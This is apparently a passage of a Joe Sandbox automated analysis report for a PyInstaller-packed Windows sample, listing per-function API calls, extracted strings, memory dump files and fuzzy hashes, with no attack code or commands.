                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD85
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DDF3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DDFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                • Instruction ID: 6a837562c8b4d135d430ccc6166c386bbaccc413c31492c88e02c2c725605bf4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F318721B1EA42DAEE11FB169C925B527D4FF48BA4F598536DD2D87388EF3CE4448310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF64487351A,?,00000000,00007FF644873F1B), ref: 00007FF644872AA0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                • Instruction ID: 48c668cb77eb8570dffbbe990ad76f74f03ae4f8b597ce6cd77e2415a8efa627
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38216D22B1DB8186E720BB51B8927E6A294BB88784F400136EE8D93A5DDF7CD2458740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                • Opcode ID: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
                                                                                                                                                                                                                                • Instruction ID: 8ff23daac34e28f961cb8ae23d9edeb7e9f529dbe03ddca6641a9341b4c75295
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19215131B0CA4696EA10BB55B9D622AA3A0FFC57A0F500635EE6D83AECDE7DD4458700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                • Instruction ID: a068081b1ad647b364f6ad8202f0667a0feb1ebce3b1417bd714d0b92f124744
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC212F24B0D6428DF969B3619AD713961525FC4BB0F144634EE3EDAADEDE2CF4408301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                • Instruction ID: 828454efcfa034140589112358b03fffd4cc8a91845e4d36557791bea7db6807
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB114C21B1CE41CAE750BB52A896329A6A0FB88FE4F044634EE5DC77A8DF7DD854C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                • API String ID: 1405196051-1299490920
                                                                                                                                                                                                                                • Opcode ID: bcd0000a8b0658819eb2787e599c4801e1d8db1979c67284f587446422cc76e8
                                                                                                                                                                                                                                • Instruction ID: f4c616c3e65b988847cc5cf63e493310bd78a8e2fab3284cb33e9afac18f2f44
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcd0000a8b0658819eb2787e599c4801e1d8db1979c67284f587446422cc76e8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F02BD62B09B8682EB289B11D560B7A77A1FF85BA4F044271EE6E0B7D9DF3CD441C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878EFD
                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878F5A
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9
                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878FE5
                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644879044
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644879055
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF64487906A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                • Opcode ID: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
                                                                                                                                                                                                                                • Instruction ID: ea800eb5fccd425ef51aff986e17c76569fcd7bf882b6aca6ee07065e78cff51
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0419362B1D68289FA30BB12A9922BA73A4FB95BD4F450135DF4D9778DDE3CE500C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                • API String ID: 1405196051-3727861699
                                                                                                                                                                                                                                • Opcode ID: c69df26a08142c3bac296afa14bbc48bbb1f6b7d590379f647cd0c614d1fc777
                                                                                                                                                                                                                                • Instruction ID: 377aedb6a864d708aff0311608897adf65b4ceedbda975d9d08c6b04aa2155cc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c69df26a08142c3bac296afa14bbc48bbb1f6b7d590379f647cd0c614d1fc777
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF19C72708BC186DB94AB59E464BAD77A0FB85B94F108036EE9E43799DF3AD844C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00007FFDFAF36AFE
                                                                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFAF367D5
                                                                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFAF367FE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                • API String ID: 1405196051-272990098
                                                                                                                                                                                                                                • Opcode ID: 6fff13bf3b6b7fc501f9dd484fdf476247ce254bc16ef6a032cff1d218471b39
                                                                                                                                                                                                                                • Instruction ID: 7fa7a4054e866c71df7f768e0db4448e54660e9632581fbb5abf32e17a0b65a8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fff13bf3b6b7fc501f9dd484fdf476247ce254bc16ef6a032cff1d218471b39
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD1C562B0978182FBA88B159464A7A7B91FF45BE4F4442B5EE6E0B7D9DF3CD481C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                • API String ID: 1405196051-3727861699
                                                                                                                                                                                                                                • Opcode ID: 3fa76793ff51000907a4173b9cd8982be06d5e4031eb3370abfe8fd6ce14fdfa
                                                                                                                                                                                                                                • Instruction ID: 3041dc56fab54e55dbfe292e806b72869e4775ec8936e2afb1e76748578e4d62
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fa76793ff51000907a4173b9cd8982be06d5e4031eb3370abfe8fd6ce14fdfa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2D1D132B08BC586DB68DF19E054B69B7A8FB94B84F554032DE6E47798EF3AD801C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: GetCurrentProcess.KERNEL32 ref: 00007FF644878590
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: OpenProcessToken.ADVAPI32 ref: 00007FF6448785A3
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: GetTokenInformation.ADVAPI32 ref: 00007FF6448785C8
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: GetLastError.KERNEL32 ref: 00007FF6448785D2
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: GetTokenInformation.ADVAPI32 ref: 00007FF644878612
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64487862E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: CloseHandle.KERNEL32 ref: 00007FF644878646
                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF644873C55), ref: 00007FF64487916C
                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF644873C55), ref: 00007FF644879175
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                • Instruction ID: bce3d37799d3d9e335fbfa39cce7c57ba69659e3440c3ac35b5d8b626efc252f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF215E21B0CB4289F610BB10E9A62EA62A5FF88780F444035EE4D83B9EDF3DD845C750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B2D7
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B30D
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B33A
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B34B
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B35C
                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B377
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                • Instruction ID: 684177b36193b1b24bf5b413935c2ba1f59ef53dd8a831283c63d5280a02d0e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59113830B4C6428AFA59B7659AD713D62829FC4BB0F044634EE2ED6ADEDE2CF4018301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                • API String ID: 1405196051-1987291987
                                                                                                                                                                                                                                • Opcode ID: 907d55e51c7058cb158fe87907fe270dc46d94b6a55033e43f7ec2f1ab85e8f8
